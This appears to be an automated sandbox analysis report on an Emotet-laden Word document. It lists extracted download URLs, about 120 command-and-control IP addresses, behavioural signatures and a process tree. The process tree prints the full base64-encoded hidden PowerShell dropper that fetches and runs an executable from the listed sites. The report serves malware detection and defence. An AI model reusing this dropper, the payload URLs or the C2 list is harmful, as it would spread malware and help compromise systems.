Analysis
-
max time kernel
23s -
resource
win10v191014 -
submitted
14-01-2020 23:24
General
Malware Config
Extracted
http://xmdivas.com/a9981b580e0fef550bcb0fd8fadcc02b/eiqgv/
http://digitaltimbangan.com/cgi-bin/cj8/
https://sports.tj/wp-includes/p5n5i1d/
https://work4sales.com/wp-content/rw5N8k08Ed/
https://rmntnk.ru/omlakdj17fkcjfsd/rxm1/
Extracted
emotet
66.7.242.50:8080
72.186.137.156:80
197.89.27.26:8080
91.250.96.22:8080
37.187.72.193:8080
104.131.44.150:8080
167.71.10.37:8080
78.24.219.147:8080
159.65.25.128:8080
95.128.43.213:8080
179.13.185.19:80
186.86.247.171:443
110.142.38.16:80
201.173.217.124:443
169.239.182.217:8080
211.63.71.72:8080
104.131.11.150:8080
190.55.181.54:443
209.146.22.34:443
64.53.242.181:8080
190.220.19.82:443
66.34.201.20:7080
27.109.153.201:8090
46.105.131.69:443
110.36.217.66:8080
120.151.135.224:80
73.217.39.73:80
87.230.19.21:8080
47.180.91.213:80
73.11.153.178:8080
45.33.49.124:443
209.141.54.221:8080
121.88.5.176:443
31.31.77.83:443
79.159.249.152:80
178.237.139.83:8080
180.92.239.110:8080
201.229.45.222:8080
173.21.26.90:80
200.116.145.225:443
221.165.123.72:80
217.160.182.191:8080
47.6.15.79:80
60.231.217.199:8080
91.205.215.66:443
182.176.132.213:8090
181.143.126.170:80
70.169.53.234:80
176.106.183.253:8080
92.222.216.44:8080
87.106.136.232:8080
103.86.49.11:8080
5.196.74.210:8080
78.142.114.69:80
105.247.123.133:8080
47.6.15.79:443
98.174.166.205:80
110.143.84.202:80
95.213.236.64:8080
2.237.76.249:80
45.51.40.140:80
91.73.197.90:80
78.186.5.109:443
120.150.246.241:80
195.244.215.206:80
58.171.42.66:8080
190.117.126.169:80
37.157.194.134:443
192.241.255.77:8080
190.12.119.180:443
190.117.226.104:80
116.48.142.21:443
200.21.90.5:443
62.75.187.192:8080
41.60.200.34:80
70.46.247.81:80
85.67.10.190:80
223.197.185.60:80
190.146.205.227:8080
62.138.26.28:8080
5.32.55.214:80
108.191.2.72:80
59.103.164.174:80
178.153.176.124:80
78.189.180.107:80
87.106.139.101:8080
210.6.85.121:80
47.156.70.145:80
173.91.11.142:80
31.172.240.91:8080
88.249.120.205:80
37.139.21.175:8080
115.95.6.218:443
206.81.10.215:8080
105.27.155.182:80
209.97.168.52:8080
205.185.117.108:8080
24.164.79.147:8080
188.0.135.237:80
139.130.242.43:80
46.105.131.87:80
189.203.177.41:443
149.202.153.252:8080
98.156.206.153:80
160.16.215.66:8080
201.184.105.242:443
98.30.113.161:80
5.154.58.24:80
173.66.96.135:80
206.189.112.148:8080
70.175.171.251:80
190.53.135.159:21
24.105.202.216:443
89.211.186.227:443
108.179.206.219:8080
139.130.241.252:443
50.116.86.205:8080
181.126.70.117:80
24.94.237.248:80
62.75.141.82:80
183.102.238.69:465
177.239.160.121:80
104.236.246.93:8080
47.153.183.211:80
Signatures
-
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
380.exepid process 4596 380.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4872 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE380.exe380.exepid process 4872 WINWORD.EXE 4592 380.exe 4596 380.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4356 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 4356 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
powershell.exe380.exedescription pid process target process PID 4356 wrote to memory of 4592 4356 powershell.exe 380.exe PID 4592 wrote to memory of 4596 4592 380.exe 380.exe -
Executes dropped EXE 2 IoCs
Processes:
380.exe380.exepid process 4592 380.exe 4596 380.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4356 4240 powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\02f1430398d91f4f11e295fa35ef1d8b68e85aec9e23174512cd1a6ed9d7f990.doc" /o ""1⤵
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Enumerates system info in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -en JABOAHoAeQBsAHIAdwBiAG0AawB0AD0AJwBBAHAAbgBtAGQAdgB6AHQAJwA7ACQAWgBxAHAAdgB4AHgAaABvAGsAcgAgAD0AIAAnADMAOAAwACcAOwAkAFgAcgBzAHYAcgBuAGUAYwBoAGsAPQAnAEgAZwBkAHMAcgB6AG4AegBnAGwAJwA7ACQAVABuAHoAdgBiAHgAaABlAG8AawBuAGEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAcQBwAHYAeAB4AGgAbwBrAHIAKwAnAC4AZQB4AGUAJwA7ACQASQBqAHYAawBvAHMAcgB6AG8AcABhAHUAegA9ACcAWQBmAHEAeABxAGkAZgBmAGYAYQAnADsAJABHAHUAbAB4AGsAcgB5AGgAcQBmAGcAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AVwBlAEIAQwBMAGkARQBOAHQAOwAkAEkAbQBzAGYAcQBxAGgAZABnAGUAdgBiAG0APQAnAGgAdAB0AHAAOgAvAC8AeABtAGQAaQB2AGEAcwAuAGMAbwBtAC8AYQA5ADkAOAAxAGIANQA4ADAAZQAwAGYAZQBmADUANQAwAGIAYwBiADAAZgBkADgAZgBhAGQAYwBjADAAMgBiAC8AZQBpAHEAZwB2AC8AKgBoAHQAdABwADoALwAvAGQAaQBnAGkAdABhAGwAdABpAG0AYgBhAG4AZwBhAG4ALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBjAGoAOAAvACoAaAB0AHQAcABzADoALwAvAHMAcABvAHIAdABzAC4AdABqAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcAA1AG4ANQBpADEAZAAvACoAaAB0AHQAcABzADoALwAvAHcAbwByAGsANABzAGEAbABlAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwByAHcANQBOADgAawAwADgARQBkAC8AKgBoAHQAdABwAHMAOgAvAC8AcgBtAG4AdABuAGsALgByAHUALwBvAG0AbABhAGsAZABqADEANwBmAGsAYwBqAGYAcwBkAC8AcgB4AG0AMQAvACcALgAiAFMAUABMAGAAaQB0ACIAKAAnACoAJwApADsAJABVAHcAegBkAG0AYgB3AG4AaAA9ACcATwBvAHMAcwB2AHMAZgBpAHQAcABwAG8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMAZwBuAHUAagBqAGoAbgBnAG8AdAAgAGkAbgAgACQASQBtAHMAZgBxAHEAaABkAGcAZQB2AGIAbQApAHsAdAByAHkAewAkAEcAdQBsAHgAawByAHkAaABxAGYAZwAuACIAZABvAHcATgBgAGwAbwBhAEQAYABGAGkATABFACIAKAAkAFMAZwBuAHUAagBqAGoAbgBnAG8AdAAsACAAJABUAG4AegB2AGIAeABoAGUAbwBrAG4AYQApADsAJABOAHoAbgBjAGUAcABqAGwAawB4AGMAPQAnAE4AcwBkAG4AYwBnAGwAYwBpAHgAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABUAG4AegB2AGIAeABoAGUAbwBrAG4AYQApAC4AIgBsAGUAbgBgAEcAVABIACIAIAAtAGcAZQAgADMAMgA0ADUAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAVAAiACgAJABUAG4AegB2AGIAeABoAGUAbwBrAG4AYQApADsAJABBAHMAagBzAGYAaQBnAG8AegBjAGkAPQAnAEMAagBjAGUAdgBwAGcAZwAnADsAYgByAGUAYQBrADsAJABRAGIAbgBpAGgAbgBlAGIAeAByAHEAPQAnAEIAcgByAHUAaQB5AG8AcQB1AGMAeQBkACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAYwBhAGQAaABpAGMAdABxAHMAegB5AGEAPQAnAEwAdABtAG4AcwBhAG0AZAAnAA==1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
-
C:\Users\Admin\380.exe"C:\Users\Admin\380.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Users\Admin\380.exe--4c4a25093⤵
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\380.exe
-
C:\Users\Admin\380.exe
-
C:\Users\Admin\380.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
-
memory/4592-7-0x0000000002270000-0x0000000002287000-memory.dmpFilesize
92KB
-
memory/4596-10-0x0000000000610000-0x0000000000627000-memory.dmpFilesize
92KB
-
memory/4596-11-0x0000000000400000-0x000000000046E000-memory.dmpFilesize
440KB